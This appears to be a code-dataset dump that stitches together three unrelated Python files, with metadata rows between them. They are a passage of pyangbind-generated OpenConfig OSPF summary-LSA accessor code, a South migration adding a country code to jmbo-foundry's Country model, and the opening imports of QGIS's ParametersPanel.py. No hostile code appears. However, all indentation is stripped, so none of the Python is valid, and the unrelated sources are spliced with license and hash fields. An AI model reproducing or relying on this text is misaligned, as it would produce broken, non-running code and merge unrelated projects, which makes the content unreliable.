base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
load = kwargs.pop("load", None)
if args:
if len(args) > 1:
raise TypeError("cannot create a YANG container with >1 argument")
all_attr = True
for e in self._pyangbind_elements:
if not hasattr(args[0], e):
all_attr = False
break
if not all_attr:
raise ValueError("Supplied object did not have the correct attributes")
for e in self._pyangbind_elements:
nobj = getattr(args[0], e)
if nobj._changed() is False:
continue
setmethod = getattr(self, "_set_%s" % e)
if load is None:
setmethod(getattr(args[0], e))
else:
setmethod(getattr(args[0], e), load=load)
def _path(self):
if hasattr(self, "_parent"):
return self._parent._path() + [self._yang_name]
else:
return [
"network-instances",
"network-instance",
"protocols",
"protocol",
"ospfv2",
"areas",
"area",
"lsdb",
"lsa-types",
"lsa-type",
"lsas",
"lsa",
"summary-lsa",
"types-of-service",
"type-of-service",
"state",
]
def _get_tos(self):
"""
Getter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
return self.__tos
def _set_tos(self, v, load=False):
"""
Setter method for tos, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/tos (uint8)
If this variable is read-only (config: false) in the
source YANG file, then _set_tos is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_tos() directly.
YANG Description: OSPF encoding of the type of service referred to by this
LSA. Encoding for OSPF TOS are described in RFC2328.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """tos must be of a type compatible with uint8""",
"defined-type": "uint8",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..255']}, int_size=8), is_leaf=True, yang_name="tos", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='uint8', is_config=False)""",
}
)
self.__tos = t
if hasattr(self, "_set"):
self._set()
def _unset_tos(self):
self.__tos = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..255"]}, int_size=8
),
is_leaf=True,
yang_name="tos",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="uint8",
is_config=False,
)
def _get_metric(self):
"""
Getter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
return self.__metric
def _set_metric(self, v, load=False):
"""
Setter method for metric, mapped from YANG variable /network_instances/network_instance/protocols/protocol/ospfv2/areas/area/lsdb/lsa_types/lsa_type/lsas/lsa/summary_lsa/types_of_service/type_of_service/state/metric (oc-ospf-types:ospf-metric)
If this variable is read-only (config: false) in the
source YANG file, then _set_metric is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_metric() directly.
YANG Description: The metric value to be used for the TOS specified. This value
represents the cost of use of the link for the specific type
of service.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(
v,
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
except (TypeError, ValueError):
raise ValueError(
{
"error-string": """metric must be of a type compatible with oc-ospf-types:ospf-metric""",
"defined-type": "oc-ospf-types:ospf-metric",
"generated-type": """YANGDynClass(base=RestrictedClassType(base_type=int, restriction_dict={'range': ['0..65535']},int_size=16), is_leaf=True, yang_name="metric", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, namespace='http://openconfig.net/yang/network-instance', defining_module='openconfig-network-instance', yang_type='oc-ospf-types:ospf-metric', is_config=False)""",
}
)
self.__metric = t
if hasattr(self, "_set"):
self._set()
def _unset_metric(self):
self.__metric = YANGDynClass(
base=RestrictedClassType(
base_type=int, restriction_dict={"range": ["0..65535"]}, int_size=16
),
is_leaf=True,
yang_name="metric",
parent=self,
path_helper=self._path_helper,
extmethods=self._extmethods,
register_paths=True,
namespace="http://openconfig.net/yang/network-instance",
defining_module="openconfig-network-instance",
yang_type="oc-ospf-types:ospf-metric",
is_config=False,
)
tos = __builtin__.property(_get_tos)
metric = __builtin__.property(_get_metric)
_pyangbind_elements = OrderedDict([("tos", tos), ("metric", metric)])
|
apache-2.0
| -3,628,145,791,548,564,000
| 40.291667
| 440
| 0.575273
| false
| 4.118543
| true
| false
| false
|
praekelt/jmbo-foundry
|
foundry/migrations/0037_auto__add_field_country_country_code__add_unique_country_slug.py
|
1
|
27780
|
# -*- coding: utf-8 -*-
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding field 'Country.country_code'
db.add_column('foundry_country', 'country_code',
self.gf('django.db.models.fields.CharField')(max_length=2, unique=True, null=True, db_index=True),
keep_default=False)
# Adding unique constraint on 'Country', fields ['slug']
db.create_unique('foundry_country', ['slug'])
def backwards(self, orm):
# Removing unique constraint on 'Country', fields ['slug']
db.delete_unique('foundry_country', ['slug'])
# Deleting field 'Country.country_code'
db.delete_column('foundry_country', 'country_code')
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'category.category': {
'Meta': {'ordering': "('title',)", 'object_name': 'Category'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'category.tag': {
'Meta': {'ordering': "('title',)", 'object_name': 'Tag'},
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'comments.comment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'Comment', 'db_table': "'django_comments'"},
'comment': ('django.db.models.fields.TextField', [], {'max_length': '3000'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'content_type_set_for_comment'", 'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'ip_address': ('django.db.models.fields.IPAddressField', [], {'max_length': '15', 'null': 'True', 'blank': 'True'}),
'is_public': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_removed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_pk': ('django.db.models.fields.TextField', [], {}),
'site': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sites.Site']"}),
'submit_date': ('django.db.models.fields.DateTimeField', [], {'default': 'None'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'comment_comments'", 'null': 'True', 'to': "orm['auth.User']"}),
'user_email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'user_name': ('django.db.models.fields.CharField', [], {'max_length': '50', 'blank': 'True'}),
'user_url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'foundry.blogpost': {
'Meta': {'ordering': "('-created',)", 'object_name': 'BlogPost', '_ormbases': ['jmbo.ModelBase']},
'content': ('ckeditor.fields.RichTextField', [], {}),
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'})
},
'foundry.chatroom': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ChatRoom', '_ormbases': ['jmbo.ModelBase']},
'modelbase_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['jmbo.ModelBase']", 'unique': 'True', 'primary_key': 'True'})
},
'foundry.column': {
'Meta': {'object_name': 'Column'},
'designation': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'row': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Row']"}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'width': ('django.db.models.fields.PositiveIntegerField', [], {'default': '8'})
},
'foundry.country': {
'Meta': {'ordering': "('title',)", 'object_name': 'Country'},
'country_code': ('django.db.models.fields.CharField', [], {'max_length': '2', 'unique': 'True', 'null': 'True', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'minimum_age': ('django.db.models.fields.PositiveIntegerField', [], {'default': '18'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '32'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '32'})
},
'foundry.defaultavatar': {
'Meta': {'object_name': 'DefaultAvatar'},
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'defaultavatar_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'foundry.foundrycomment': {
'Meta': {'ordering': "('submit_date',)", 'object_name': 'FoundryComment', '_ormbases': ['comments.Comment']},
'comment_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['comments.Comment']", 'unique': 'True', 'primary_key': 'True'}),
'in_reply_to': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.FoundryComment']", 'null': 'True', 'blank': 'True'}),
'moderated': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'})
},
'foundry.link': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Link'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'link_target_content_type'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'url': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'})
},
'foundry.listing': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Listing'},
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'content': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['jmbo.ModelBase']", 'null': 'True', 'blank': 'True'}),
'content_type': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['contenttypes.ContentType']", 'null': 'True', 'blank': 'True'}),
'count': ('django.db.models.fields.IntegerField', [], {}),
'display_title_tiled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'items_per_page': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'pinned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'listing_pinned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['jmbo.ModelBase']"}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'style': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'foundry.member': {
'Meta': {'object_name': 'Member', '_ormbases': ['auth.User']},
'about_me': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'country': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Country']", 'null': 'True', 'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'dob': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'member_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'facebook_id': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'mobile_number': ('django.db.models.fields.CharField', [], {'max_length': '64', 'null': 'True', 'blank': 'True'}),
'receive_email': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'receive_sms': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'twitter_username': ('django.db.models.fields.CharField', [], {'max_length': '128', 'null': 'True', 'blank': 'True'}),
'user_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['auth.User']", 'unique': 'True', 'primary_key': 'True'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'foundry.menu': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Menu'},
'display_title': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'foundry.menulinkposition': {
'Meta': {'ordering': "('position',)", 'object_name': 'MenuLinkPosition'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'condition_expression': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Link']"}),
'menu': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Menu']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'position': ('django.db.models.fields.IntegerField', [], {})
},
'foundry.navbar': {
'Meta': {'ordering': "('title', 'subtitle')", 'object_name': 'Navbar'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
'foundry.navbarlinkposition': {
'Meta': {'ordering': "('position',)", 'object_name': 'NavbarLinkPosition'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'condition_expression': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Link']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'navbar': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Navbar']"}),
'position': ('django.db.models.fields.IntegerField', [], {})
},
'foundry.notification': {
'Meta': {'object_name': 'Notification'},
'created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'link': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Link']"}),
'member': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Member']"})
},
'foundry.page': {
'Meta': {'object_name': 'Page'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_homepage': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '32'}),
'subtitle': ('django.db.models.fields.CharField', [], {'max_length': '256', 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'foundry.pageview': {
'Meta': {'object_name': 'PageView'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Page']"}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
'foundry.row': {
'Meta': {'object_name': 'Row'},
'block_name': ('django.db.models.fields.CharField', [], {'default': "'content'", 'max_length': '32'}),
'has_left_or_right_column': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'page': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Page']"})
},
'foundry.tile': {
'Meta': {'object_name': 'Tile'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'}),
'column': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['foundry.Column']"}),
'condition_expression': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'enable_ajax': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'index': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'target_content_type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'tile_target_content_type'", 'null': 'True', 'to': "orm['contenttypes.ContentType']"}),
'target_object_id': ('django.db.models.fields.PositiveIntegerField', [], {'null': 'True'}),
'view_name': ('django.db.models.fields.CharField', [], {'max_length': '200', 'null': 'True', 'blank': 'True'})
},
'jmbo.modelbase': {
'Meta': {'ordering': "('-created',)", 'object_name': 'ModelBase'},
'anonymous_comments': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'anonymous_likes': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Category']", 'null': 'True', 'blank': 'True'}),
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'comments_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'comments_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'created': ('django.db.models.fields.DateTimeField', [], {'blank': 'True'}),
'crop_from': ('django.db.models.fields.CharField', [], {'default': "'center'", 'max_length': '10', 'blank': 'True'}),
'date_taken': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'effect': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'modelbase_related'", 'null': 'True', 'to': "orm['photologue.PhotoEffect']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '100', 'blank': 'True'}),
'likes_closed': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'likes_enabled': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'modified': ('django.db.models.fields.DateTimeField', [], {}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'null': 'True', 'blank': 'True'}),
'primary_category': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'primary_modelbase_set'", 'null': 'True', 'to': "orm['category.Category']"}),
'publish_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'publishers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['publisher.Publisher']", 'null': 'True', 'blank': 'True'}),
'retract_on': ('django.db.models.fields.DateTimeField', [], {'db_index': 'True', 'null': 'True', 'blank': 'True'}),
'sites': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sites.Site']", 'null': 'True', 'blank': 'True'}),
'slug': ('django.db.models.fields.SlugField', [], {'unique': 'True', 'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'unpublished'", 'max_length': '32', 'null': 'True', 'blank': 'True'}),
'subtitle': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '200', 'null': 'True', 'blank': 'True'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['category.Tag']", 'null': 'True', 'blank': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'view_count': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'})
},
'photologue.photoeffect': {
'Meta': {'object_name': 'PhotoEffect'},
'background_color': ('django.db.models.fields.CharField', [], {'default': "'#FFFFFF'", 'max_length': '7'}),
'brightness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'color': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'contrast': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'description': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'filters': ('django.db.models.fields.CharField', [], {'max_length': '200', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'}),
'reflection_size': ('django.db.models.fields.FloatField', [], {'default': '0'}),
'reflection_strength': ('django.db.models.fields.FloatField', [], {'default': '0.6'}),
'sharpness': ('django.db.models.fields.FloatField', [], {'default': '1.0'}),
'transpose_method': ('django.db.models.fields.CharField', [], {'max_length': '15', 'blank': 'True'})
},
'publisher.publisher': {
'Meta': {'object_name': 'Publisher'},
'class_name': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']", 'null': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'title': ('django.db.models.fields.CharField', [], {'max_length': '64'})
},
'secretballot.vote': {
'Meta': {'unique_together': "(('token', 'content_type', 'object_id'),)", 'object_name': 'Vote'},
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'object_id': ('django.db.models.fields.PositiveIntegerField', [], {}),
'token': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'vote': ('django.db.models.fields.SmallIntegerField', [], {})
},
'sites.site': {
'Meta': {'ordering': "('domain',)", 'object_name': 'Site', 'db_table': "'django_site'"},
'domain': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
}
}
complete_apps = ['foundry']
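# Illustrative usage sketch (not part of the original migration): applying this South
# migration programmatically through Django's management API. The app label and the
# '0037' prefix follow the migration's own file name; running it via manage.py is the
# usual route, this is only the equivalent in-code call.
def _example_apply_migration():
    from django.core.management import call_command
    call_command('migrate', 'foundry', '0037')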
|
bsd-3-clause
| 169,661,863,726,752,320
| 83.43769
| 208
| 0.546724
| false
| 3.649501
| false
| false
| false
|
siliconsmiley/QGIS
|
python/plugins/processing/gui/ParametersPanel.py
|
1
|
16790
|
# -*- coding: utf-8 -*-
"""
***************************************************************************
ParametersPanel.py
---------------------
Date : August 2012
Copyright : (C) 2012 by Victor Olaya
(C) 2013 by CS Systemes d'information (CS SI)
Email : volayaf at gmail dot com
otb at c-s dot fr (CS SI)
Contributors : Victor Olaya
Alexia Mondot (CS SI) - managing the new parameter
ParameterMultipleExternalInput
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Victor Olaya'
__date__ = 'August 2012'
__copyright__ = '(C) 2012, Victor Olaya'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
import locale
from PyQt4 import uic
from PyQt4.QtCore import QCoreApplication, QVariant
from PyQt4.QtGui import QWidget, QLayout, QVBoxLayout, QHBoxLayout, QToolButton, QIcon, QLabel, QCheckBox, QComboBox, QLineEdit, QPlainTextEdit
from processing.core.ProcessingConfig import ProcessingConfig
from processing.gui.OutputSelectionPanel import OutputSelectionPanel
from processing.gui.InputLayerSelectorPanel import InputLayerSelectorPanel
